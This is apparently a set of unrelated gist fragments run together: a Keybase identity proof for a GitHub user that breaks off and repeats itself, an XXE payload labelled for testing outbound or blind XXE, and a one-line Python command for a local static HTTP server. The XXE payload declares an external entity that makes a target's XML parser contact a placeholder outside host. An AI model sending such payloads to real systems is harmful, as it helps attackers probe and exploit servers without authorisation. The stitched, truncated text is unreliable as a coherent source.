I hereby claim:
- I am wojtekwm on github.
- I am wojtekwm (https://keybase.io/wojtekwm) on keybase.
- I have a public key ASAHr7w7eDxffvQ1_oXyQe3-Al9hqYiEjfsX54ieiTYxNQo
To claim this, I am signing this object:
I hereby claim:
To claim this, I am signing this object:
-------------------------------------------------------------- | |
Vanilla, used to verify outbound xxe or blind xxe | |
-------------------------------------------------------------- | |
<?xml version="1.0" ?> | |
<!DOCTYPE r [ | |
<!ELEMENT r ANY > | |
<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt"> | |
]> | |
<r>&sp;</r> |
Each of these commands will run an ad hoc http static server in your current (or specified) directory, available at http://localhost:8000. Use this power wisely.
$ python -m SimpleHTTPServer 8000